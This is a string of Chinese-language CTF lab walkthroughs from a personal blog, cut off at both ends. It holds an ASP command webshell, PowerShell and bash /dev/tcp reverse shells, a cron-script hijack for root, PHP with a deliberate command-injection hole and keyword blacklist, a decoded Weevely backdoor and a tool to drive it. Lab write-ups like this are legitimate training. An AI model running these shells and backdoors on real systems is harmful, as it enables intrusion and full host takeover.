<%Response.Write(Request.ServerVariables('LOCAL_ADDR'))%> <% szCMD = request('cmd') thisDir = getCommandOutput('cmd /c' & szCMD) Response.Write(thisDir)%> </p> <br> </BODY> <%Response.write('<!-'&'-') %> --> ```  弹个**shell**回来 ```bash powershell -nop -c '$client = New-Object System.Net.Sockets.TCPClient('192.168.205.141',8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' #攻击机 ┌──(kali㉿kali)-[~/test/netcat] └─$ nc -lvnp 8888 listening on [any] 8888 ... connect to [192.168.205.141] from (UNKNOWN) [192.168.205.221] 49159 whoami win-4qu3qnhnk7e\info ``` --- # 3.提权 拿到**shell**后看看权限 ```bash PS C:\users\info> whoami /priv INFORMACI?N DE PRIVILEGIOS -------------------------- Nombre de privilegio Descripci?n Estado ============================= ============================================ ============= SeChangeNotifyPrivilege Omitir comprobaci?n de recorrido Habilitada SeImpersonatePrivilege Suplantar a un cliente tras la autenticaci?n Habilitada SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Deshabilitado ``` 我们有 `SeImpersonatePrivilege`权限，所以我们可以使用 **[JuicyPotato](https://github.com/ohpe/juicy-potato)** 工具来提升权限。https://7r1UMPH.github.io/post/thl_ensala-papas.htmlThu, 20 Mar 2025 08:31:25 +0000https://7r1UMPH.github.io/post/thl_casa-paco.html# thl_casa-paco # 0.简介 **靶机**：[thehackerslabs - casa-paco](https://thehackerslabs.com/casa-paco/) **难度**：初学者 **目标 IP**：192.168.205.137 **本机 IP**：192.168.205.141 # 1.扫描 `nmap`起手 ```bash ┌──(kali㉿kali)-[~/test] └─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.137 Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-15 09:41 CST Nmap scan report for 192.168.205.137 Host is up (0.00084s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:E2:C1:37 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 2.81 seconds ``` 先看**80端口**，**22端口**候补 # 2.踩点  把域名加入`hosts`  是个点餐的网站，你按照它的提示一直点到下单页，你发现`Plato`可以**执行命令**，但是有**限制**，连`ls`都无法执行,并且**无法绕过**，爆破一下可执行命令 ```bash ┌──(kali㉿kali)-[~/test] └─$ wfuzz -c -u 'http://casapaco.thl/llevar.php' -w /usr/share/seclists/Fuzzing/1-4_all_letters_a-z.txt --hc 404 -d 'name=a&dish=FUZZ' --hw 89,75 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://casapaco.thl/llevar.php Total requests: 475254 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000023: 200 32 L 109 W 1276 Ch 'w' 000000110: 200 36 L 126 W 1478 Ch 'df' 000000125: 200 33 L 95 W 1184 Ch 'du' 000000238: 200 31 L 92 W 1202 Ch 'id' 000000435: 200 50 L 170 W 1814 Ch 'ps' 000000394: 200 31 L 90 W 1156 Ch 'od' 000000513: 200 70 L 390 W 5108 Ch 'ss' 000000601: 200 31 L 93 W 1172 Ch 'wc' 000000581: 200 32 L 173 W 3792 Ch 'vi' 000001112: 200 59 L 265 W 2439 Ch 'apt' 000001160: 200 34 L 110 W 1476 Ch 'arp' 000002956: 200 31 L 95 W 1215 Ch 'dir' （省略） ``` 发现可以执行`dir`  当你`dir`，你就会发现有一个叫`llevar1.php`的页面（爆破不出来，只可以这样看），你可以使用`od`工具查看他文本  我直接放**可读版本**了，想看原版的，自己执行一下 ```bash <!DOCTYPE html> <html lang='es'> <head> <meta charset='UTF-8'> <meta name='viewport' content='width=device-width, initial-scale=1.0'> <title>Casa Paco - Para Llevar</title> <link rel='stylesheet' href='static/styles.css'> </head> <body> <header> <h1>Casa Paco - Pedido para Llevar</h1> </header> <main> <h2>Haz tu pedido para llevar</h2> <form action='llevar.php' method='POST' class='order-form'> <label for='name'>Nombre:</label> <input type='text' id='name' name='name' placeholder='Tu nombre' required><br> <label for='dish'>Plato:</label> <input type='text' id='dish' name='dish' placeholder='Ejemplo: Pizza' required><br> <button type='submit' class='btn'>Enviar Pedido</button> </form> <?php if ($_SERVER['REQUEST_METHOD'] == 'POST') { $name = htmlspecialchars($_POST['name']); // Sanitizamos para evitar errores visuales $dish = $_POST['dish']; // Intencionalmente sin sanitizar para la vulnerabilidad // Comando vulnerable $output = shell_exec('$dish'); echo '<section class='confirmation'>'; echo '<h3>Pedido confirmado</h3>'; echo '<p>Gracias, <strong>$name</strong>. Tu pedido de <strong>$dish</strong> está listo para llevar.</p>'; echo '<h3>Salida del Comando:</h3>'; echo '<pre>$output</pre>'; echo '</section>'; } ?> </main> <footer> <p>&copy; 2025 Casa Paco. Todos los derechos reservados.</p> </footer> </body> </html> ``` 实现的和`llevar.php`一样，但是他没有**限制**，但是你不**锁死**这个网页，他就会把你的命令交给`llevar.php`执行，就寄寄，下面是`llevar.php`的代码 ```bash <!DOCTYPE html> <html lang='es'> <head> <meta charset='UTF-8'> <meta name='viewport' content='width=device-width, initial-scale=1.0'> <title>Casa Paco - Pedido para Llevar</title> <link rel='stylesheet' href='static/styles.css'> </head> <body> <header> <h1>Casa Paco - Pedido para Llevar</h1> </header> <main> <h2>Haz tu pedido para llevar</h2> <form action='llevar.php' method='POST' class='order-form'> <label for='name'>Nombre:</label> <input type='text' id='name' name='name' placeholder='Tu nombre' required><br> <label for='dish'>Plato:</label> <input type='text' id='dish' name='dish' placeholder='Ejemplo: Cocido' required><br> <button type='submit' class='btn'>Enviar Pedido</button> </form> </main> <?php if ($_SERVER['REQUEST_METHOD'] === 'POST') { $name = htmlspecialchars($_POST['name']); $dish = $_POST['dish']; // Filtrar comandos potencialmente peligrosos $blacklist_pattern = '/\b(whoami|ls|pwd|cat|sh|bash)\b/i'; if (preg_match($blacklist_pattern, $dish)) { die('<p style='color: red;'>Error: Pedido comprometido.</p>'); } // Permitir solo caracteres válidos $allowed_pattern = '/^[a-zA-Z0-9\s\-_\.]+$/'; if (!preg_match($allowed_pattern, $dish)) { die('<p style='color: red;'>Error: Pedido contiene caracteres no permitidos.</p>'); } // Ejecutar comando (no debe ser usado en un entorno de producción sin validaciones más estrictas) $output = shell_exec($dish); echo '<section class='confirmation'>'; echo '<h3>Pedido confirmado</h3>'; echo '<p>Gracias, <strong>$name</strong>. Tu pedido de <strong>$dish</strong> estará listo para llevar.</p>'; echo '<h3>Salida del Comando:</h3>'; echo '<pre>$output</pre>'; echo '</section>'; } ?> <footer> <p>&copy; 2025 Casa Paco. Todos los derechos reservados.</p> </footer> </body> </html> ``` 那就简单了我们锁死`llevar1.php`提交命令就好了  要进行**base64绕过**，不然执行不了 ```bash ┌──(kali㉿kali)-[~/test] └─$ nc -lvnp 8888 listening on [any] 8888 ... id connect to [192.168.205.141] from (UNKNOWN) [192.168.205.137] 45002 bash: cannot set terminal process group (534): Inappropriate ioctl for device bash: no job control in this shell www-data@Thehackerslabs-CasaPaco:/var/www/html$ id uid=33(www-data) gid=33(www-data) groups=33(www-data) ``` # 3. 获得稳定的 Shell 获取**反向 shell** 后，通过以下命令获得稳定的**交互式** **TTY shell**： ```bash script /dev/null -c bash ctrl+z stty raw -echo; fg reset xterm export TERM=xterm echo $SHELL export SHELL=/bin/bash stty rows 59 cols 236 ``` # 4.提权 ```bash www-data@Thehackerslabs-CasaPaco:/var/www/html$ cd /home/ www-data@Thehackerslabs-CasaPaco:/home$ ls -la total 12 drwxr-xr-x 3 root root 4096 Jan 14 16:52 . drwxr-xr-x 18 root root 4096 Jan 13 14:47 .. drwxr-xr-x 3 pacogerente pacogerente 4096 Jan 14 17:08 pacogerente www-data@Thehackerslabs-CasaPaco:/home$ cd pacogerente/ www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ ls -al total 36 drwxr-xr-x 3 pacogerente pacogerente 4096 Jan 14 17:08 . drwxr-xr-x 3 root root 4096 Jan 14 16:52 .. lrwxrwxrwx 1 root root 9 Jan 14 16:58 .bash_history -> /dev/null -rw-r--r-- 1 pacogerente pacogerente 220 Mar 29 2024 .bash_logout -rw-r--r-- 1 pacogerente pacogerente 3526 Mar 29 2024 .bashrc drwxr-xr-x 3 pacogerente pacogerente 4096 Jan 13 20:24 .local -rw-r--r-- 1 pacogerente pacogerente 807 Mar 29 2024 .profile -rwxrw-rw- 1 pacogerente pacogerente 110 Jan 14 16:57 fabada.sh -rw-r--r-- 1 root root 2417 Jan 15 03:06 log.txt -rw-r--r-- 1 pacogerente pacogerente 33 Jan 14 17:06 user.txt www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ cat fabada.sh #!/bin/bash # Generar un log de actividad echo 'Ejecutado por cron el: $(date)' >> /home/pacogerente/log.txt ``` 写个脚本覆盖掉`fabada.sh`就行了（不要问我为什么不看`pspy`，我看它长的都像定时任务☝( ◠‿◠ )☝） ```bash www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ echo -e '#!/bin/bash\n/bin/bash -i >& /dev/tcp/192.168.205.141/8889 0>&1' > fabada. www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ cat fabada.sh #!/bin/bash /bin/bash -i >& /dev/tcp/192.168.205.141/8889 0>&1 ``` 等一会，它定时挺快的 ```bash ┌──(kali㉿kali)-[~/test] └─$ nc -lvnp 8889 listening on [any] 8889 ... iconnect to [192.168.205.141] from (UNKNOWN) [192.168.205.137] 42802 bash: no se puede establecer el grupo de proceso de terminal (4096): Función ioctl no apropiada para el dispositivo bash: no hay control de trabajos en este shell root@Thehackerslabs-CasaPaco:~# d id uid=0(root) gid=0(root) grupos=0(root) ``` 下班。https://7r1UMPH.github.io/post/thl_casa-paco.htmlThu, 20 Mar 2025 08:30:24 +0000https://7r1UMPH.github.io/post/nyx_APex.html# nyx_APex # 0.简介 **靶机**：[vulnyx - APex](https://vulnyx.com/file/APex.php) **难度**：Easy **目标 IP**：192.168.205.148 **本机 IP**：192.168.205.141 # 1.扫描 `nmap`起手 ``` ┌──(kali㉿kali)-[~/test] └─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.148 Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-22 19:17 CST Nmap scan report for 192.168.205.148 Host is up (0.00026s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 79/tcp open finger 80/tcp open http MAC Address: 08:00:27:8E:D9:36 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 1.56 seconds ``` 其中79是我没有见过的服务，优先级最高 # 2.踩点 在hacktricks搜索到了相关[网页](https://book.hacktricks.wiki/zh/network-services-pentesting/pentesting-finger.html#79---pentesting-finger)  有Metasploit的脚本，我们优先利用一下 ```bash ┌──(kali㉿kali)-[~/test] └─$ msfconsole msf6 > use auxiliary/scanner/finger/finger_users msf6 auxiliary(scanner/finger/finger_users) > show options Module options (auxiliary/scanner/finger/finger_users): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metas ploit/basics/using-metasploit.html RPORT 79 yes The target port (TCP) THREADS 1 yes The number of concurrent threads (max one per host) USERS_FILE /usr/share/metasploit-framework/data/ yes The file that contains a list of default UNIX accounts. wordlists/unix_users.txt View the full module info with the info, or info -d command. msf6 auxiliary(scanner/finger/finger_users) > set RHOSTS 192.168.205.148 RHOSTS => 192.168.205.148 msf6 auxiliary(scanner/finger/finger_users) > run [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: _apt [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: backup [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: bin [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: daemon [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: dnsmasq [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: games [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: gnats [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: irc [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: list [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: lp [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: mail [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: man [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: messagebus [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: news [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: nobody [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: proxy [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: root [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: sshd [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: sync [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: sys [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: systemd-coredump [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: systemd-network [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: systemd-resolve [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: systemd-timesync [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: uucp [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: uuidd [+] 192.168.205.148:79 - 192.168.205.148:79 - Found user: www-data [+] 192.168.205.148:79 - 192.168.205.148:79 Users found: _apt, backup, bin, daemon, dnsmasq, games, gnats, irc, list, lp, mail, man, messagebus, news, nobody, proxy, root, sshd, sync, sys, systemd-coredump, systemd-network, systemd-resolve, systemd-timesync, uucp, uuidd, www-data [*] 192.168.205.148:79 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed ``` 提取数据进行爆破 ```bash ┌──(kali㉿kali)-[~/test] └─$ cat user |awk -F ': ' '{print $2}' _apt backup bin daemon dnsmasq games gnats irc list lp mail man messagebus news nobody proxy root sshd sync sys systemd-coredump systemd-network systemd-resolve systemd-timesync uucp uuidd www-data ┌──(kali㉿kali)-[~/test] └─$ while read -r user; do echo '$user' | nc -vn 192.168.205.148 79; done < user (UNKNOWN) [192.168.205.148] 79 (finger) open Login: _apt Name: Directory: /nonexistent Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: backup Name: backup Directory: /var/backups Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: bin Name: bin Directory: /bin Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: daemon Name: daemon Directory: /usr/sbin Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: dnsmasq Name: dnsmasq Directory: /var/lib/misc Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: games Name: games Directory: /usr/games Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: gnats Name: Gnats Bug-Reporting System (admin) Directory: /var/lib/gnats Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: irc Name: ircd Directory: /run/ircd Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: list Name: Mailing List Manager Directory: /var/list Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: lp Name: lp Directory: /var/spool/lpd Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: mail Name: mail Directory: /var/mail Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: man Name: man Directory: /var/cache/man Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: messagebus Name: Directory: /nonexistent Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: news Name: news Directory: /var/spool/news Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: nobody Name: nobody Directory: /nonexistent Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: proxy Name: proxy Directory: /bin Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: root Name: root Directory: /root Shell: /bin/bash Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: sshd Name: Directory: /run/sshd Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: sync Name: sync Directory: /bin Shell: /bin/sync Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: sys Name: sys Directory: /dev Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: systemd-coredump Name: systemd Core Dumper Directory: / Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: systemd-network Name: systemd Network Management Directory: /run/systemd Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: systemd-resolve Name: systemd Resolver Directory: /run/systemd Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: systemd-timesync Name: systemd Time Synchronization Directory: /run/systemd Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: uucp Name: uucp Directory: /var/spool/uucp Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: uuidd Name: Directory: /run/uuidd Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. (UNKNOWN) [192.168.205.148] 79 (finger) open Login: www-data Name: www-data Directory: /var/www Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. ``` 没有有意思的东西，我们去看看Web服务吧  没有有意思的东西，源码也没有，我们去爆破目录 ```bash ┌──(kali㉿kali)-[~/test] └─$ gobuster dir -u 'http://192.168.205.148' -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x php,html,txt,md =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.205.148 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: html,txt,md,php [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /backup (Status: 401) [Size: 462] /index.html (Status: 200) [Size: 878] /server-status (Status: 403) [Size: 280] /.html (Status: 403) [Size: 280] ```  好像找到重点了，扫描一下架构 ```bash ┌──(kali㉿kali)-[~/test] └─$ nuclei -u 192.168.205.148 __ _ ____ __ _______/ /__ (_) / __ \/ / / / ___/ / _ \/ / / / / / /_/ / /__/ / __/ / /_/ /_/\__,_/\___/_/\___/_/ v3.3.8 projectdiscovery.io [WRN] Found 2 templates with runtime error (use -validate flag for further examination) [INF] Current nuclei version: v3.3.8 (latest) [INF] Current nuclei-templates version: v10.1.2 (latest) [WRN] Scan results upload to cloud is disabled. [INF] New templates added in latest release: 52 [INF] Templates loaded for current scan: 7656 [INF] Executing 7276 signed templates from projectdiscovery/nuclei-templates [WRN] Loading 380 unsigned templates for scan. Use with caution. [INF] Targets loaded for current scan: 1 [INF] Running httpx on input host [INF] Found 1 URL from httpx [INF] Templates clustered: 1698 (Reduced 1598 Requests) [INF] Using Interactsh Server: oast.fun [waf-detect:apachegeneric] [http] [info] http://192.168.205.148 [ssh-sha1-hmac-algo] [javascript] [info] 192.168.205.148:22 [ssh-server-enumeration] [javascript] [info] 192.168.205.148:22 ['SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3'] [ssh-password-auth] [javascript] [info] 192.168.205.148:22 [ssh-auth-methods] [javascript] [info] 192.168.205.148:22 ['['publickey','password']'] [openssh-detect] [tcp] [info] 192.168.205.148:22 ['SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3'] [options-method] [http] [info] http://192.168.205.148 ['HEAD,GET,POST,OPTIONS'] [http-missing-security-headers:x-frame-options] [http] [info] http://192.168.205.148 [http-missing-security-headers:x-content-type-options] [http] [info] http://192.168.205.148 [http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://192.168.205.148 [http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://192.168.205.148 [http-missing-security-headers:strict-transport-security] [http] [info] http://192.168.205.148 [http-missing-security-headers:content-security-policy] [http] [info] http://192.168.205.148 [http-missing-security-headers:permissions-policy] [http] [info] http://192.168.205.148 [http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://192.168.205.148 [http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://192.168.205.148 [http-missing-security-headers:referrer-policy] [http] [info] http://192.168.205.148 [http-missing-security-headers:clear-site-data] [http] [info] http://192.168.205.148 [apache-detect] [http] [info] http://192.168.205.148 ['Apache/2.4.62 (Debian)'] ``` 无果，拷一份网站下来，还是没有东西。https://7r1UMPH.github.io/post/nyx_APex.htmlThu, 20 Mar 2025 08:27:18 +0000https://7r1UMPH.github.io/post/Kali%20Linux%20-zheng-jiu-ji-hua-%EF%BC%9A-xiu-fu-chuang-kou-wu-fa-yi-dong-ji-kong-zhi-an-niu-xiao-shi-wen-ti.html## 问题场景 在使用 Kali Linux (通常是 XFCE 桌面环境) 时，可能会遇到一个令人困惑的问题：在登录系统后，应用程序窗口（如终端）突然失去了其标题栏，这意味着右上角的最小化、最大化、关闭按钮消失了，并且无法通过鼠标拖动来移动窗口。https://7r1UMPH.github.io/post/Kali%20Linux%20-zheng-jiu-ji-hua-%EF%BC%9A-xiu-fu-chuang-kou-wu-fa-yi-dong-ji-kong-zhi-an-niu-xiao-shi-wen-ti.htmlThu, 20 Mar 2025 08:25:15 +0000https://7r1UMPH.github.io/post/hmv_Wave.html# hmv_Wave # 0.简介 **靶机**：[hackmyvm - Wave](https://hackmyvm.eu/machines/machine.php?vm=Wave) **难度**：黄色 **目标 IP**：192.168.205.138 **本机 IP**：192.168.205.141 # 1.扫描 `nmap`起手 ```bash ┌──(kali㉿kali)-[~/test] └─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.138 Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-18 18:30 CST Nmap scan report for 192.168.205.138 Host is up (0.00029s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 5555/tcp open freeciv MAC Address: 08:00:27:37:83:76 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 1.58 seconds ``` 去80看看web页面 # 2.踩点  爆破目录 ```bash ┌──(kali㉿kali)-[~/test] └─$ feroxbuster -u 'http://192.168.205.138/' -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x php,html,txt,md ___ ___ __ __ __ __ __ ___ |__ |__ |__) |__) | / ` / \ \_/ | | \ |__ | |___ | \ | \ | \__, \__/ / \ | |__/ |___ by Ben 'epi' Risher 🤓 ver: 2.11.0 ───────────────────────────┬────────────────────── 🎯 Target Url │ http://192.168.205.138/ 🚀 Threads │ 50 📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt 👌 Status Codes │ All Status Codes! 💥 Timeout (secs) │ 7 🦡 User-Agent │ feroxbuster/2.11.0 💉 Config File │ /etc/feroxbuster/ferox-config.toml 🔎 Extract Links │ true 💲 Extensions │ [php, html, txt, md] 🏁 HTTP methods │ [GET] 🔃 Recursion Depth │ 4 ───────────────────────────┴────────────────────── 🏁 Press [ENTER] to use the Scan Management Menu™ ────────────────────────────────────────────────── 404 GET 7l 11w 153c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 200 GET 3l 5w 32c http://192.168.205.138/backup/phptest.bck 200 GET 3l 6w 31c http://192.168.205.138/backup/index.bck 200 GET 2l 1w 4c http://192.168.205.138/backup/log.log 200 GET 1l 2w 18c http://192.168.205.138/backup/robots.bck 200 GET 2l 13w 833c http://192.168.205.138/backup/weevely.bck 200 GET 3l 6w 31c http://192.168.205.138/ 301 GET 7l 11w 169c http://192.168.205.138/backup => http://192.168.205.138/backup/ 200 GET 3l 6w 31c http://192.168.205.138/index.html 200 GET 1l 2w 18c http://192.168.205.138/robots.txt 200 GET 1l 2w 11c http://192.168.205.138/phptest.php [####################] - 48s 311445/311445 0s found:10 errors:0 [####################] - 47s 311410/311410 6566/s http://192.168.205.138/ [####################] - 0s 311410/311410 77852500/s http://192.168.205.138/backup/ => Directory listing (add --scan-dir-listings to scan) ``` 探索一下 ```bash ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.138/backup/phptest.bck <?php print ('HELLO WORLD'); ?> ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.138/backup/index.bck <h1> WAVE </h1> <!-- wAvE --> ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.138/backup/log.log OK ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.138/backup/robots.bck Disallow: /backup ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.138/backup/weevely.bck Warning: Binary output can mess up your terminal. Use '--output -' to tell curl to output it to your terminal anyway, or consider Warning: '--output <FILE>' to save to a file. ``` 找到了一个文件，我们下载下来看看 ```bash ┌──(kali㉿kali)-[~/test] └─$ curl http://192.168.205.138/backup/weevely.bck -o /tmp/weevely.bck % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 515 100 515 0 0 217k 0 --:--:-- --:--:-- --:--:-- 251k ┌──(kali㉿kali)-[~/test] └─$ cd tmp ┌──(kali㉿kali)-[~/test/tmp] └─$ cat weevely.bck <?php include '\160\x68\141\x72\72\57\57'.basename(__FILE__).'\57\x78';__HALT_COMPILER(); ?>/x�X���U��j�0ſ�)J�hB�S;��� �/�J��▒m�.��)��n�(▒��'`�=6�&T�YE�p��(�q1���a'H�Pq6�.���v���/��8�ije��$+��s�'����5�|��H�� O����w�2%��OyTV���Q�b�A���h��=�W {�� �kЛw8�a����S����� �fBLXx ���Ϝ����v����m���%#,H��R#2HJ]�t�|*��������h�Ms�� ږ&'��Y���P��B��lXw�l�e���E!S�He�2�p�7G�[N��=�-��Ƀ�i�)�[��N����7��U_�=*��Ψ�s?c((VGBMB ``` 部分内容显示乱码，但是我们通过可读的可以得知，可能是一个恶意后门，我们尝试恢复一下 ```bash ┌──(kali㉿kali)-[~/test/tmp] └─$ file weevely.bck weevely.bck: PHP phar archive with SHA1 signature ┌──(kali㉿kali)-[~/test/tmp] └─$ phar extract -f weevely.bck weevely.phpr //home/kali/test/tmp/weevely.bck/x ...ok ┌──(kali㉿kali)-[~/test/tmp] └─$ cat /home/kali/test/tmp/weevely.phpr/home/kali/test/tmp/weevely.bck/x <?php eval('$k='3ddf0d5c';$kh='b6e7a529b6c2';$kf='d598a771749b';$p='afnqDsRcBpVmU71y'; function x($t,$k){ $c=strlen($k);$l=strlen($t);$o=''; for($i=0;$i<$l;){ for($j=0;($j<$c&&$i<$l);$j++,$i++) { $o.=$t[$i]^$k[$j]; } } return $o; } if (@preg_match('/$kh(.+)$kf/',@file_get_contents('php://input'),$m)==1) { @ob_start(); @eval(@gzuncompress(@x(@base64_decode($m[1]),$k))); $o=@ob_get_contents(); @ob_end_clean(); $r=@base64_encode(@x(@gzcompress($o),$k)); print('$p$kh$r$kf'); }'); ``` 确实是**Webshell 后门**，我们尝试利用一下 ```bash ┌──(kali㉿kali)-[~/…/kali/test/tmp/weevely.bck] └─$ cat tool.php <?php $k = '3ddf0d5c'; // 密钥 function x($t, $k) { $c = strlen($k); // 密钥长度 $l = strlen($t); // 文本长度 $o = ''; // XOR 加密/解密 for ($i = 0; $i < $l;) { for ($j = 0; ($j < $c && $i < $l); $j++, $i++) { $o .= chr(ord($t[$i]) ^ ord($k[$j])); } } return $o; } echo '选择操作：\n'; echo '1. 加密\n'; echo '2. 解密\n'; $choice = trim(fgets(STDIN)); // 获取用户输入 echo '请输入文本：\n'; $input_text = trim(fgets(STDIN)); // 获取要加密/解密的文本 if ($choice == 1) { // 加密 echo '加密前的文本: ' . $input_text . '\n'; // 压缩文本 $compressed_text = gzcompress($input_text); // 压缩文本 $encrypted_text = x($compressed_text, $k); // XOR 加密 echo '加密后的文本: ' . base64_encode($encrypted_text) . '\n'; // 输出 Base64 编码后的加密文本 } elseif ($choice == 2) { // 解密 $decoded_text = base64_decode($input_text); // Base64 解码 $decrypted_text = x($decoded_text, $k); // XOR 解密 // 解压缩 $decompressed = @gzuncompress($decrypted_text); // 解压缩，使用 @ 避免警告 // 